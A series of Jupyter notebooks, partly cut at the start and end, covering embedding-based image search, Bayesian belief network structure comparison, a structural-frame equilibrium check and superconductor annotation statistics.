    return embeddings, path_index
def save_image_embeddings(image_embeddings_filename,
                          image_embeddings,
                          mapping_filename,
                          image_path_index):
    """Persist embeddings as ``<name>.npy`` and the index-to-path mapping as
    ``<name>.json`` (the counterpart of ``load_image_embeddings``)."""
    np.save("%s.npy" % image_embeddings_filename, image_embeddings)
    with open("%s.json" % mapping_filename, 'w') as mapping_file:
        json.dump(image_path_index, mapping_file)
def nearest_neighbors(vector, annoy_index, item_index, k=10):
    """Return ``[annoy_id, item, distance]`` triples for the k nearest items
    to *vector* in *annoy_index*, resolving ids through *item_index*."""
    ids, dists = annoy_index.get_nns_by_vector(vector, k, include_distances=True)
    return [[item_id, item_index[item_id], dists[pos]]
            for pos, item_id in enumerate(ids)]
def get_hybrid_embeddings(generate_embeddings=False):
    """Return ``(image_hybrid_embeddings, image_path_index)``.

    With generate_embeddings=True the embeddings are recomputed with the
    trained hybrid model and saved to disk; otherwise previously saved
    results are loaded from ``./model_and_index_iaprtc12``.
    """
    image_hybrid_embeddings_filepath = "./model_and_index_iaprtc12/image_embeddings"
    image_path_indexes_filepath = "./model_and_index_iaprtc12/image_path_indexes"
    # Generating embedding might take 5-10min.
    if generate_embeddings:
        image_hybrid_embeddings, image_path_index = \
            generate_image_embeddings(image_paths, hybrid_model)
        save_image_embeddings(image_hybrid_embeddings_filepath,
                              image_hybrid_embeddings,
                              image_path_indexes_filepath,
                              image_path_index)
        return image_hybrid_embeddings, image_path_index
    else:
        image_hybrid_embeddings, image_path_index = \
            load_image_embeddings(image_hybrid_embeddings_filepath,
                                  image_path_indexes_filepath)
        return image_hybrid_embeddings, image_path_index
image_hybrid_embeddings, image_path_index = get_hybrid_embeddings(generate_embeddings=False)
image_annoy_index = get_annoy_index(image_hybrid_embeddings, number_of_trees=1000)
```
# DEMO
```
from IPython.display import Image
from IPython.display import HTML, display
import urllib.request
```
```
def display_similar_images(mean_embedding, image_path=None):
    """Render the ten images nearest to *mean_embedding* as a 5x2 HTML table,
    optionally preceded by the query image itself."""
    closest_images = nearest_neighbors(mean_embedding, image_annoy_index, image_path_index)
    parts = ["<script>$('div.cell.selected').next().height(100);</script>\n"]
    if image_path is not None:
        parts.append("<h1>Our input image</h1>")
        parts.append("<img src='%s'>" % image_path)
    parts.append("<h1>Similar images</h1>")
    parts.append("<table>")
    for row in range(5):
        left_cell = closest_images[2 * row][1]
        right_cell = closest_images[2 * row + 1][1]
        parts.append("<tr><td><img src='%s'></td>" % left_cell)
        parts.append("<td><img src='%s'></td></tr>" % right_cell)
    parts.append("</table>\n")
    display(HTML("".join(parts)))
def search_by_text(text):
    """Show the images closest to the mean word vector of *text*.

    Every token of *text* must be present in ``word_embeddings``.
    """
    token_vectors = [word_embeddings[token] for token in text.split()]
    display_similar_images(np.mean(token_vectors, axis=0))
def get_image_labels(image_path, display_image=False):
    """Predict the nearest vocabulary words for a single image.

    The image is loaded at the training resolution, VGG16-preprocessed,
    pushed through the hybrid model to get a word-space embedding, and the
    closest words are looked up in the word Annoy index.

    Returns:
        list of [annoy_id, word, distance] triples (10 nearest words).
    """
    if display_image:
        display(Image(filename=image_path))
    # Batch of one image, shaped like the training tensors.
    images = np.zeros(shape=(1,)+images_vgg16.shape[1:])
    img = image.load_img(image_path, target_size=images_vgg16.shape[1:-1])
    x_raw = image.img_to_array(img)
    images[0] = np.expand_dims(x_raw, axis=0)
    inputs = preprocess_input(images)
    image_features = hybrid_model.predict(inputs)[0]
    closest_labels = nearest_neighbors(image_features, word_annoy_index, word_index)
    return closest_labels
def search_similar_images(image_location, from_url=False):
    """Find images similar to the one at *image_location*.

    With from_url=True the image is first downloaded to the working
    directory. The image is labelled via ``get_image_labels`` and the mean
    label embedding drives the similarity search.
    """
    if from_url:
        local_name = image_location.split("/")[-1]
        urllib.request.urlretrieve(image_location, local_name)
        image_path = local_name
    else:
        image_path = image_location
    labels = [label for _, label, _ in get_image_labels(image_path)]
    mean_embedding = np.mean([word_embeddings[label] for label in labels], axis=0)
    display_similar_images(mean_embedding, image_path)
```
*Identifying labels on some pictures from the dataset:*
```
get_image_labels(image_paths[223], display_image=True)
```
*Searching for specific category/label:*
```
search_by_text("plane")
```
*Searching for categories that are not in image dataset:*
```
search_by_text("birds")
search_by_text("ocean")
search_by_text("street")
```
*Achieving more complex queries by combining words:*
```
search_by_text("bird near water")
```
*Since we are able to identify labels on an image, we can perform search by image:*
```
search_similar_images(image_paths[650])
search_similar_images(image_paths[711])
```
*The same goes for images outside of the dataset*
```
search_similar_images('./demo_images/moor-moorland-grasses-wetland-nature-conservation-nature-reserve-nature-landscape-wetlands.jpg')
search_by_text("fence")
search_by_text("sky")
search_by_text("snow")
```
| github_jupyter |
# Inference from data using different Bayesian Belief Network (BBN) Structures
This notebook shows how to apply different BBN structures to the same parameters. The parameters, means and covariances, are estimated from data generated from linear equations. Approximate inference is then performed on each BBN to observe the associated parameters.
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import networkx as nx
from pybbn.lg.graph import Dag, Parameters, Bbn
np.random.seed(37)
```
There are five variables: x0, x1, x2, x3, and x4.
```
# Structural (linear) equations used to generate the synthetic samples:
# x0 and x2 are exogenous; x1 <- x0; x3 <- x1, x2; x4 <- x3. Unit-variance noise.
num_samples = 10000
x0 = 2.0 + np.random.standard_normal(num_samples)
x1 = 5.0 + 2.0 * x0 + np.random.standard_normal(num_samples)
x2 = 2.0 + np.random.standard_normal(num_samples)
x3 = 1.0 + 0.3 * x1 + 0.5 * x2 + np.random.standard_normal(num_samples)
x4 = 8.0 + 0.9 * x3 + np.random.standard_normal(num_samples)
df = pd.DataFrame({
'x0': x0,
'x1': x1,
'x2': x2,
'x3': x3,
'x4': x4})
# The BBN parameters are the empirical means and covariances of the samples.
means = np.array(df.mean())
cov = np.array(df.cov().values)
```
Model 1's structure represents the true model's structure. The structures of Models 2, 3, and 4 are made-up ones. We perform approximate inference for each BBN and observe how the estimated parameters associated with the BBN compare to the parameters associated with the linear equations.
```
# create the directed acylic graph
# this is based on the true structure
# create the directed acyclic graph
# this is based on the true structure: x0 -> x1 -> x3 <- x2, x3 -> x4
dag1 = Dag()
dag1.add_node(0)
dag1.add_node(1)
dag1.add_node(2)
dag1.add_node(3)
dag1.add_node(4)
dag1.add_edge(0, 1)
dag1.add_edge(1, 3)
dag1.add_edge(2, 3)
dag1.add_edge(3, 4)
# The parameters are estimated from the samples above
params = Parameters(means, cov)
# create the bayesian belief network
bbn1 = Bbn(dag1, params)
# create the directed acyclic graph
# this is based on an imposed (incorrect) structure; note x4's parent is x1 here
dag2 = Dag()
dag2.add_node(0)
dag2.add_node(1)
dag2.add_node(2)
dag2.add_node(3)
dag2.add_node(4)
dag2.add_edge(0, 1)
dag2.add_edge(1, 3)
dag2.add_edge(1, 4)
dag2.add_edge(2, 3)
# create the bayesian belief network
bbn2 = Bbn(dag2, params)
# create the directed acyclic graph
# this is based on an imposed structure; the x2/x3 edge is reversed here
dag3 = Dag()
dag3.add_node(0)
dag3.add_node(1)
dag3.add_node(2)
dag3.add_node(3)
dag3.add_node(4)
dag3.add_edge(0, 1)
dag3.add_edge(1, 3)
dag3.add_edge(3, 4)
dag3.add_edge(3, 2)
# create the bayesian belief network
bbn3 = Bbn(dag3, params)
# fourth imposed structure: drops the x1 -> x3 edge entirely
dag4 = Dag()
dag4.add_node(0)
dag4.add_node(1)
dag4.add_node(2)
dag4.add_node(3)
dag4.add_node(4)
dag4.add_edge(0, 1)
dag4.add_edge(2, 3)
dag4.add_edge(3, 4)
# create the bayesian belief network
bbn4 = Bbn(dag4, params)
```
Do some approximate inference and observe how the estimated parameters compare to the empirical ones. Note that `x1` has `x0` as a parent, `x3` as a child, and `x2` as a coparent and so its [Markov blanket](https://en.wikipedia.org/wiki/Markov_blanket) is `x0, x3, x2`. If we condition on the Markov blanket of `x1`, then we know all we need to know to estimate the state of `x1`. In the approximate inference algorithm we are using, [Gibbs sampling](https://en.wikipedia.org/wiki/Gibbs_sampling), we sample each variable based on its Markov blanket as defined by the structure of the BBN. Since Model 1's structure represents the true relationships between all the variables, we expect that the parameter estimation from it would be closest to the empirical one.
* Empirical mean of `x1` is 8.99
* Estimated mean of `x1` with Model 1 is 8.75
* Estimated mean of `x1` with Model 2 is 8.06
* Estimated mean of `x1` with Model 3 is 9.34
* Estimated mean of `x1` with Model 4 is 9.98
```
# Compare the empirical means with the means estimated by approximate
# inference (Gibbs sampling) under each BBN structure.
print(means)
print(bbn1.do_inference()[0])
print(bbn2.do_inference()[0])
print(bbn3.do_inference()[0])
print(bbn4.do_inference()[0])
```
Look at the log likelihood of the data given the models. As you can see, log likelihood of the data given model 1 is the highest.
```
# Score each candidate structure by the log likelihood of the full data matrix.
data_mat = df.values
logp1 = bbn1.log_prob(data_mat)
logp2 = bbn2.log_prob(data_mat)
logp3 = bbn3.log_prob(data_mat)
logp4 = bbn4.log_prob(data_mat)
print('log prob of model 1 {}'.format(logp1))
print('log prob of model 2 {}'.format(logp2))
print('log prob of model 3 {}'.format(logp3))
print('log prob of model 4 {}'.format(logp4))
```
Here's the plots of the four models.
```
import warnings
# Suppress drawing warnings (presumably networkx/matplotlib deprecation noise — confirm).
with warnings.catch_warnings():
warnings.simplefilter('ignore')
# 2x2 grid: one DAG per subplot.
plt.figure(figsize=(10, 10))
plt.subplot(221)
nx.draw(bbn1.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 1')
plt.subplot(222)
nx.draw(bbn2.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 2')
plt.subplot(223)
nx.draw(bbn3.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 3')
plt.subplot(224)
nx.draw(bbn4.dag.g,with_labels=True, font_weight='bold')
plt.title('Model 4')
```
| github_jupyter |
## Check Equilibrium
This notebook reads files describing a structure, and the files output by Frame2D after an
analysis, and checks that the forces and moments on every node are in equilibrium.
It does this in the simplest way possible, using quite different logic than Frame2D, resulting
in a higher degree of confidence in the results. It would have been better had someone else
programmed it, but oh well ...
```
# Data set and load case to check; the commented-out pair selects an alternate test case.
ds = 'KG82'
lcase = 'all'
#ds = 'l22x6'
#lcase = 'Case-2b'
def filename(basename, lc=None):
    """Build the path of a CSV data file for the current data set ``ds``.

    :param basename: base file name without extension
    :param lc: optional load-case subdirectory to prepend
    :return: path of the form ``data/<ds>.d/[<lc>/]<basename>.csv``
    """
    rel = basename if lc is None else lc + '/' + basename
    return 'data/' + ds + '.d/' + rel + '.csv'
def Warn(msg):
    """Print a prominent console warning; the check never aborts."""
    text = '!!!!! Warning: {}'.format(msg)
    print(text)
import pandas as pd
import math
class Node(object):
    """A frame node: an ID, coordinates, and running force/moment sums.

    The ``sum*`` attributes accumulate applied loads, reactions and member
    end forces; in equilibrium each should end up (numerically) zero.
    """

    def __init__(self, id, x, y):
        self.id = id
        self.x = x
        self.y = y
        # Running totals, updated as the check processes each force table.
        self.sumFX = 0.0
        self.sumFY = 0.0
        self.sumMZ = 0.0
# Read the node table; a duplicated NODEID is warned about and the last definition wins.
table = pd.read_csv(filename('nodes'))
NODES = {}
for i,n in table.iterrows():
if n.NODEID in NODES:
Warn("Node '{}' is multiply defined.".format(n.NODEID))
NODES[n.NODEID] = Node(n.NODEID,float(n.X),float(n.Y))
class Member(object):
    """A frame member between two nodes.

    Precomputes the member length and the direction cosines used to rotate
    member-local end forces into global axes.
    """

    def __init__(self, id, nodej, nodek):
        self.id = id
        self.nodej = nodej
        self.nodek = nodek
        delta_x = nodek.x - nodej.x
        delta_y = nodek.y - nodej.y
        length = math.sqrt(delta_x * delta_x + delta_y * delta_y)
        self.L = length
        self.cosx = delta_x / length
        self.cosy = delta_y / length
# Read the member table, resolving the J/K node references through NODES.
table = pd.read_csv(filename('members'))
MEMBERS = {}
for i,m in table.iterrows():
if m.MEMBERID in MEMBERS:
Warn("Member '{}' is multiply defined.".format(m.MEMBERID))
MEMBERS[m.MEMBERID] = Member(m.MEMBERID,NODES[m.NODEJ],NODES[m.NODEK])
# Build the load-combination factors for the selected case; when the file is
# absent, fall back to applying every load with a factor of 1.
try:
lctable = pd.read_csv(filename('load_combinations'))
use_all = False
COMBO = {}
for i,row in lctable.iterrows():
if row.CASE == lcase:
COMBO[row.LOAD.lower()] = row.FACTOR
except OSError:
use_all = True
COMBO = None
COMBO
# Accumulate the applied node loads, scaled by the combination factor, into
# each node's running force/moment sums.
table = pd.read_csv(filename('node_loads'))
for i,p in table.iterrows():
f = 1.0 if use_all else COMBO.get(p.LOAD.lower(),0.)
dirn = p.DIRN.upper()
if dirn in ['FX','FY','MZ']:
n = NODES[p.NODEID]
a = 'sum'+dirn
setattr(n,a,getattr(n,a,0.)+float(p.F)*f)
else:
Warn("Direction '{}' invalid for node '{}'.".format(dirn,p.NODEID))
# Add P-Delta forces if the analysis produced them (the file is optional).
try:
table = pd.read_csv(filename('pdelta_forces',lcase))
for i,p in table.iterrows():
n = NODES[p.NODEID]
n.sumFX += p.FX
n.sumFY += p.FY
n.sumMZ += p.MZ
except OSError:
pass
# Add the reaction forces; missing components count as zero.
table = pd.read_csv(filename('reaction_forces',lcase))
for i,r in table.iterrows():
n = NODES[r.NODEID]
n.sumFX += 0. if pd.isnull(r.FX) else float(r.FX)
n.sumFY += 0. if pd.isnull(r.FY) else float(r.FY)
n.sumMZ += 0. if pd.isnull(r.MZ) else float(r.MZ)
table
# Subtract the member end forces, rotated from member-local axes to global
# axes with the direction cosines; the residual at each node should be ~0.
mtable = pd.read_csv(filename('member_end_forces',lcase))
for i,row in mtable.iterrows():
m = MEMBERS[row.MEMBERID]
n = m.nodej
n.sumFX -= row.FXJ*m.cosx - row.FYJ*m.cosy
n.sumFY -= row.FXJ*m.cosy + row.FYJ*m.cosx
n.sumMZ -= row.MZJ
n = m.nodek
n.sumFX -= row.FXK*m.cosx - row.FYK*m.cosy
n.sumFY -= row.FXK*m.cosy + row.FYK*m.cosx
n.sumMZ -= row.MZK
mtable
# Scale for the zero test below: residuals below (largest force/moment)*1E-11
# are treated as exact zeros, i.e. within round-off of the analysis.
maxF = max([mtable[c].abs().max() for c in 'FXJ FXK FYJ FYK'.split()])
maxM = max([mtable[c].abs().max() for c in 'MZJ MZK'.split()])
maxF,maxM
sums = pd.DataFrame([(n.id,n.sumFX,n.sumFY,n.sumMZ) for n in NODES.values()],
columns=['ID','sumFX','sumFY','sumMZ']).set_index(['ID'])
sums
lm = 1E-11
sums['sumFX'][sums['sumFX'].abs() <= maxF*lm] = 0
sums['sumFY'][sums['sumFY'].abs() <= maxF*lm] = 0
sums['sumMZ'][sums['sumMZ'].abs() <= maxM*lm] = 0
sums
sums.abs().max()
```
| github_jupyter |
## Annotation analysis (labelling)
This notebook is an attempt to compute dynamic statistics of the Superconductor dataset tags and labels.
```
import csv
import json
import os
import sys
from difflib import SequenceMatcher
from pathlib import Path
from sys import argv
import pysbd
from bs4 import BeautifulSoup, NavigableString, Tag
from grobid_tokenizer import tokenizeSimple
seg = pysbd.Segmenter(language="en")
def process_dir(input):
    """Walk *input* recursively and collect per-document statistics.

    Every file whose name ends in ``.xml`` (case-insensitive) is processed
    with :func:`process_file`; other files are skipped.

    :param input: root directory to scan
    :return: list of per-document statistics dicts, in walk order
    """
    accumulated_statistics = []
    for root, dirs, files in os.walk(input):
        xml_names = (name for name in files if name.lower().endswith(".xml"))
        for name in xml_names:
            abs_path = os.path.join(root, name)
            print("Processing: " + str(abs_path))
            accumulated_statistics.append(process_file(abs_path))
    return accumulated_statistics
def process_file(input):
    """Compute annotation statistics for one annotated TEI/XML file.

    Parses the file with BeautifulSoup, walks the header title/abstract/keywords
    and every top-level body tag, and counts paragraphs, sentences, tokens and
    ``<rs>`` entity annotations (per-type counts plus a per-content frequency
    distribution).

    :param input: path to the XML file
    :return: dict of per-document statistics
    :raises Exception: if an ``<rs>`` element has no ``type`` attribute
    """
    with open(input, encoding='utf-8') as fp:
        doc = fp.read()
    soup = BeautifulSoup(doc, 'xml')
    entities_statistics = {}
    document_statistics = {
        'name': Path(input).name,
        'path': str(Path(input).absolute()),
        'paragraphs': 0,
        'sentences': 0,
        'tokens': 0,
        'entities': 0,
        'uniq_entities': 0,
        'classes': 0,
        'entities_statistics': entities_statistics
    }
    # Collect the annotated containers: header title/abstract/keywords plus
    # every Tag directly under the body.
    children = []
    for child in soup.tei.children:
        if child.name == 'teiHeader':
            children.append(child.find_all("title"))
            children.extend([subchild.find_all("p") for subchild in child.find_all("abstract")])
            children.append(child.find_all("ab", {"type": "keywords"}))
        elif child.name == 'text':
            children.append([subsubchild for subchild in child.find_all("body") for subsubchild in subchild.children if
                             type(subsubchild) is Tag])
    for child in children:
        for pTag in child:
            paragraphText = ''
            document_statistics['paragraphs'] += 1
            for item in pTag.contents:
                if type(item) == NavigableString:
                    paragraphText += str(item)
                elif type(item) is Tag and item.name == 'rs':
                    # BUG FIX: the entity text used to be appended twice,
                    # inflating the token and sentence counts.
                    paragraphText += item.text
                    document_statistics['entities'] += 1
                    tag_content = item.text
                    if 'type' not in item.attrs:
                        raise Exception("RS without type is invalid. Stopping")
                    tag_name = item.attrs['type']
                    if tag_name not in entities_statistics:
                        entities_statistics[tag_name] = {
                            'count': 1,
                            'content_distribution': {
                                tag_content: 1
                            }
                        }
                    else:
                        content_ = entities_statistics[tag_name]
                        content_['count'] += 1
                        if tag_content not in content_['content_distribution']:
                            content_['content_distribution'][tag_content] = 1
                        else:
                            content_['content_distribution'][tag_content] += 1
            document_statistics['tokens'] += len(tokenizeSimple(paragraphText))
            document_statistics['sentences'] += len(seg.segment(paragraphText))
    document_statistics['classes'] = len(set(entities_statistics.keys()))
    uniq_entities = 0
    for key in entities_statistics:
        uniq_entities += len(entities_statistics[key]['content_distribution'])
    document_statistics['uniq_entities'] = uniq_entities
    ## Cross checks
    # Verify that the sum of the content distribution corresponds to the tag distribution.
    # BUG FIX: these checks were written as `assert "msg", cond`, which asserts a
    # truthy string and can never fail; the condition now comes first.
    total_entities = 0
    for tag in entities_statistics:
        count = entities_statistics[tag]['count']
        sum_content_distributions = 0
        content_distribution_dict = entities_statistics[tag]['content_distribution']
        for content in content_distribution_dict:
            sum_content_distributions += content_distribution_dict[content]
        assert count == sum_content_distributions, \
            "Number of total entities per tag does not correspond to the sum."
        total_entities += count
    assert total_entities == document_statistics['entities'], \
        "Number of total entities per document does not correspond to the sum."
    return document_statistics
def group_by_with_soft_matching(input_list, threshold):
    """Group similar strings using difflib's similarity ratio.

    Each string that is not already grouped becomes a group head; every later
    string whose case-insensitive similarity ratio with the head exceeds
    *threshold* is appended to that head's group. A string may match (and be
    listed under) more than one head.

    :param input_list: strings to group
    :param threshold: similarity ratio in [0, 1] two strings must exceed
    :return: dict mapping each group head to the list of strings grouped under it
    """
    # Cleaned up: removed the unused `last_matching` counter, the unused inner
    # enumerate index, the dead `else: continue`, and the loop-variable
    # shadowing inside the comprehension. Behavior is unchanged.
    matching = {}
    for index_x, x in enumerate(input_list):
        already_grouped = [member for members in matching.values() for member in members]
        if x not in matching and x not in already_grouped:
            matching[x] = []
            for y in input_list[index_x + 1:]:
                if x == y:
                    continue
                if SequenceMatcher(None, x.lower(), y.lower()).ratio() > threshold:
                    matching[x].append(y)
    return matching
def aggregate(entities_statistics, threshold):
    """
    Aggregate the statistics by merging content belonging to the same entity:
    - variation of expressions (e.g. cuprates, cuprate, Cuprates, ...)
    - synonyms (e.g. 111, cuprates, ...)

    :param entities_statistics: per-tag statistics, each with a 'content_distribution' dict
    :param threshold: similarity ratio above which two contents are merged
    :return: an aggregated statistics for documents (tag -> {head: [variants]})
    """
    agg = {}
    for tag in entities_statistics:
        # Numeric-valued tags are deliberately left unaggregated.
        if tag == 'tcValue' or tag == 'pressure':
            continue
        distribution = entities_statistics[tag]["content_distribution"]
        content_list = sorted(distribution.keys())
        aggregated = group_by_with_soft_matching(content_list, threshold)
        agg[tag] = aggregated
        # BUG FIX: this check was written as `assert "msg", cond` (never fails)
        # and compared against the wrong dict (`agg` instead of `aggregated`).
        # Because a variant can soft-match several group heads and be counted
        # twice, the mismatch is reported as a warning rather than asserted.
        grouped_total = len(aggregated) + len([y for x in aggregated for y in aggregated[x]])
        if len(content_list) != grouped_total:
            print("Warning: total number of elements does not correspond "
                  "with the aggregated ones for tag '{}'".format(tag))
    return agg
def extract_csv(output_data):
    """Flatten the per-tag content distributions into CSV-ready rows.

    :param output_data: statistics dict with an 'entities_statistics' entry
    :return: list of ``[tag, content, frequency]`` rows, in dict order
    """
    stats = output_data['entities_statistics']
    return [
        [tag, content, frequency]
        for tag, tag_stats in stats.items()
        for content, frequency in tag_stats['content_distribution'].items()
    ]
def intersection(lst1, lst2):
    """Return the elements of *lst1* that also occur in *lst2*.

    Order (and duplicates) of *lst1* are preserved; *lst2* is converted to a
    set once so each membership test is O(1).
    """
    members = set(lst2)
    return [item for item in lst1 if item in members]
def extract_inconsistencies(output_data):
    """List annotation contents that were labelled with more than one tag.

    For every pair of tags, finds the contents they share and records both
    tags and the per-tag frequencies.

    :param output_data: statistics dict with an 'entities_statistics' entry
    :return: list of ``[content, tag1, freq1, tag2, freq2]`` rows
    """
    entity_statistics = output_data['entities_statistics']
    # Per-tag list of distinct annotated contents, in dict order.
    contents_by_tag = {
        tag: list(tag_stats['content_distribution'].keys())
        for tag, tag_stats in entity_statistics.items()
    }
    inconsistencies = []
    tags = list(contents_by_tag.keys())
    for i, tag1 in enumerate(tags):
        for tag2 in tags[i + 1:]:
            # Contents of tag1 that also appear under tag2 (tag1 order kept).
            seen_in_tag2 = set(contents_by_tag[tag2])
            shared = [c for c in contents_by_tag[tag1] if c in seen_in_tag2]
            for content in shared:
                freq1 = entity_statistics[tag1]['content_distribution'][content]
                freq2 = entity_statistics[tag2]['content_distribution'][content]
                inconsistencies.append([content, tag1, freq1, tag2, freq2])
    return inconsistencies
def find_longest_entities(output_data, topValues=10):
# TODO: unimplemented stub — currently just dumps the whole statistics dict;
# the topValues parameter is not used yet.
print(output_data)
```
Analysis
```
def run_analysis(input):
# Compute corpus-level statistics over all annotated XML files under *input*:
# sums of the per-document counters plus a merged per-tag content distribution.
output_data = {}
input_path = Path(input)
documents_statistics = process_dir(input_path)
aggregated_entities_statistics = {}
output_data = {
'path': str(Path(input_path).absolute()),
'files': len(documents_statistics),
'paragraphs': 0,
'sentences': 0,
'tokens': 0,
'entities': 0,
'uniq_entities': 0,
'classes': 0,
'entities_statistics': aggregated_entities_statistics
}
classes = []
## Summary of all articles
for document_statistics in documents_statistics:
output_data['paragraphs'] += document_statistics['paragraphs']
output_data['sentences'] += document_statistics['sentences']
output_data['tokens'] += document_statistics['tokens']
output_data['entities'] += document_statistics['entities']
output_data['uniq_entities'] += document_statistics['uniq_entities']
# Merge each document's per-tag counts and content distributions.
for tag in document_statistics['entities_statistics']:
classes.append(tag)
tag_statistics = document_statistics['entities_statistics'][tag]
if tag not in aggregated_entities_statistics:
# NOTE(review): this aliases the first document's dict, so later merges
# mutate that document's statistics in place — confirm this is intended.
aggregated_entities_statistics[tag] = tag_statistics
else:
count = tag_statistics['count']
aggregated_entities_statistics[tag]['count'] += count
dist = tag_statistics['content_distribution']
aggregated_distribution = aggregated_entities_statistics[tag]['content_distribution']
for content in dist:
if content not in aggregated_distribution:
aggregated_distribution[content] = dist[content]
else:
aggregated_distribution[content] += dist[content]
output_data['classes'] = len(set(classes))
output_data['documents'] = documents_statistics
# Soft-match similar contents (threshold 0.90) and collect cross-tag conflicts.
output_data['aggregated_statistics'] = aggregate(aggregated_entities_statistics, 0.90)
output_data["inconsistencies"] = extract_inconsistencies(output_data)
#find_longest_entities(output_data)
return output_data
```
Run Analysis
```
input = "../data/annotated"
result = run_analysis(input)
```
Extract summary on class repartition by frequency
```
columns=['files', 'paragraphs', 'sentences', 'tokens', 'entities', 'uniq_entities', 'classes']
rows = [result[c] for c in columns]
import pandas as pd
pd.DataFrame([rows], columns=columns)
import json
aggregated_statistics = result['aggregated_statistics']
entities_statistics = result['entities_statistics']
# print(json.dumps(entities_statistics, indent=4))
labels = []
values = []
for label in entities_statistics.keys():
labels.append(label)
values.append(entities_statistics[label]['count'])
## PIE
import matplotlib.pyplot as plt
import numpy as np
def func(pct, allvals):
    """Format a pie-slice label as 'xx.x%' with the absolute count below it."""
    total = np.sum(allvals)
    absolute = int(pct / 100. * total)
    return "{:.1f}%\n({:d})".format(pct, absolute)
fig, ax = plt.subplots(figsize=(4, 8), subplot_kw=dict(aspect="equal"))
wedges, texts, autotexts = ax.pie(values, autopct=lambda pct: func(pct, values),
textprops=dict(color="w"))
ax.legend(wedges, labels,
title="Labels",
loc="center left",
bbox_to_anchor=(1, 0, 0.5, 1))
plt.setp(autotexts, size=8, weight="bold")
ax.set_title("Class repartition by frequency")
plt.show()
## HISTOGRAM
plt.rcdefaults()
fig, ax = plt.subplots()
ax.barh(labels, values, align='center')
ax.set_yticklabels(labels)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Frequency')
ax.set_title('Class repartition by frequency')
plt.show()
#csv_row = extract_csv(output_data)
```
# Inconsistencies
In the following section we show annotations that have been annotated in different ways.
For example, if a certain name "xyz" has been annotated with two different labels, it is listed here.
This doesn't necessarily mean it's an error. We can conclude that the inconsistency tc-material can be attributed to mistakes, while material-class is due to ambiguities and overlap in the definition of both labels, where the outcome depends strongly on the context.
```
inconsistent_classes = result["inconsistencies"]
# print(inconsistent_classes)
rows = inconsistent_classes
columns=['name', 'class 1', 'frequency', 'class 2', 'frequency']
import pandas as pd
pd.DataFrame(rows, columns=columns)
```
The following code identifies entity content whose length is more than 400% of the average content length for its class.
```
import pprint
# pprint.PrettyPrinter().pprint(result['entities_statistics'])
for label, value in result['entities_statistics'].items():
print(label)
average = 0
total = 0
for content, count in result['entities_statistics'][label]['content_distribution'].items():
average += len(content)
total +=1
average = average / total
for content, count in result['entities_statistics'][label]['content_distribution'].items():
if((len(content) / average) * 100) > 400:
print(content)
print("")
```
# Label summary
In this section we analyse each label and output:
- top terms
- the aggregation of similar terms using soft-matching
```
def plot_top_10(label, statistics):
# Plot a horizontal bar chart of the ten most frequent contents for *label*,
# and print the tag's total annotation count.
class_statistics = statistics[label]
class_count = class_statistics['count']
print("count: " + str(class_count))
class_frequency = class_statistics['content_distribution']
# Sort contents by frequency, descending, and keep the first ten.
sorted_by_value = {k: v for k, v in sorted(class_frequency.items(), key=lambda item: item[1], reverse=True)}
top_10 = {k:sorted_by_value[k] for k in list(sorted_by_value.keys())[0:10]}
# print(json.dumps(top_10, indent=4))
## HISTOGRAM
plt.rcdefaults()
fig, ax = plt.subplots()
items = list(top_10.values())
keys = list(top_10.keys())
ax.barh(keys, items , align='center')
ax.set_yticklabels(keys)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Frequency')
ax.set_title(label +' annotation values top terms')
plt.show()
def aggregate_by_soft_matching(statistics, aggregated):
    """Fold the counts of soft-matched variants into their group head.

    For every group in *aggregated* (head -> list of variants), each variant's
    count in *statistics* is added to the head's count and the variant's own
    count is zeroed. *statistics* is mutated in place and also returned.

    :param statistics: content -> count mapping
    :param aggregated: head -> [variants] grouping (from soft matching)
    :return: the mutated *statistics* dict
    """
    merged_count = 0
    for head, variants in aggregated.items():
        for variant in variants:
            statistics[head] += statistics[variant]
            statistics[variant] = 0
            merged_count += 1
    print("Aggregating " + str(merged_count) + " elements")
    return statistics
```
## Class
the label `<class> `
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
# print(json.dumps(entities_statistics['class'], indent=4))
# plot_top_10('class', entities_statistics)
content_distribution = entities_statistics["class"]['content_distribution']
aggregated_statistics = result['aggregated_statistics']["class"]
entities_statistics["class"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
## TODO update count
# Aggregated statistics via soft-matching
# print(json.dumps(result, indent=4))
# with open("bao.json", 'w') as f:
# json.dump(result, f, indent=4)
# print(json.dumps(entities_statistics["class"]['content_distribution'], indent=4))
plot_top_10("class", entities_statistics)
#print(json.dumps(entities_statistics["class"], indent=4))
# agg_statistics_soft_matching_inv_map = {v: k for k, v in agg_statistics_soft_matching.items()}
# print(json.dumps(agg_statistics_soft_matching_inv_map, indent=4))
```
## Material
the label `<material> `
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
aggregated_statistics = result['aggregated_statistics']['material']
content_distribution = entities_statistics["material"]['content_distribution']
entities_statistics["material"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
plot_top_10("material", entities_statistics)
```
## Class (from Materials) distribution
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
aggregated_statistics = result['aggregated_statistics']['material']
content_distribution = entities_statistics["material"]['content_distribution']
entities_statistics["material"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
entities_statistics["material"]['content_distribution']
# plot_top_10("material", entities_statistics)
```
## Critical temperature expressions
the label `<tc>`
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
aggregated_statistics = result['aggregated_statistics']['tc']
content_distribution = entities_statistics["tc"]['content_distribution']
#entities_statistics["tc"]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
plot_top_10("tc", entities_statistics)
```
## Measurement Methods
the label `<me_methods>`
```
import copy
entities_statistics = copy.copy(result['entities_statistics'])
name = 'me_method'
aggregated_statistics = result['aggregated_statistics'][name]
content_distribution = entities_statistics[name]['content_distribution']
entities_statistics[name]['content_distribution'] = aggregate_by_soft_matching(content_distribution, aggregated_statistics)
plot_top_10(name, entities_statistics)
local_distribution = copy.copy(entities_statistics[name]['content_distribution'])
# Coarse manual classification of measurement-method mentions: a mention is
# assigned to the first class whose keyword appears in its lowercased text.
classes = {
"specific heat": {
"total":0,
"values": [],
